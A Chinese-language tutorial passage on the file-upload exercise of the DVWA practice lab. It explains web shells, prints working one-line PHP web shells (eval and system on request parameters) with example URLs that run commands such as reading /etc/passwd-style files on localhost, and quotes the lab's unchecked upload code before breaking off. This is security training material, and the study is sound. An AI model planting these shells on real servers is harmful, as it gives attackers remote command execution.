DVWA靶场实践-低中高三个安全等级
关于Webshell
Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。
小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。
shell2.php #eval使用php函数,例如phpinfo( )
<?php eval($_REQUEST[‘cmd’]);?>
http://127.0.0.1/dvwa/hackable/iploads/shell2.php?cmd=phpinfo();
shell3.php #system使用linux系统命令,例如ls,cp,rm
<?php system($_REQUEST[‘yangge’]);?>
http://127.0.0.1/dvwa/hackable/iploads/shell3php?yangge=cat /etc/password
<?php eval($_POST[‘chopper’]);?>
说明:REQUEST是在网页端输入变量访问,POST则是使用像中国菜刀之类的工具连接,是C/S架构。
安全等级:Low
查看码源:对上传的文件没有进行检测。
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{
$target_path} succesfully uploaded!</pre>"<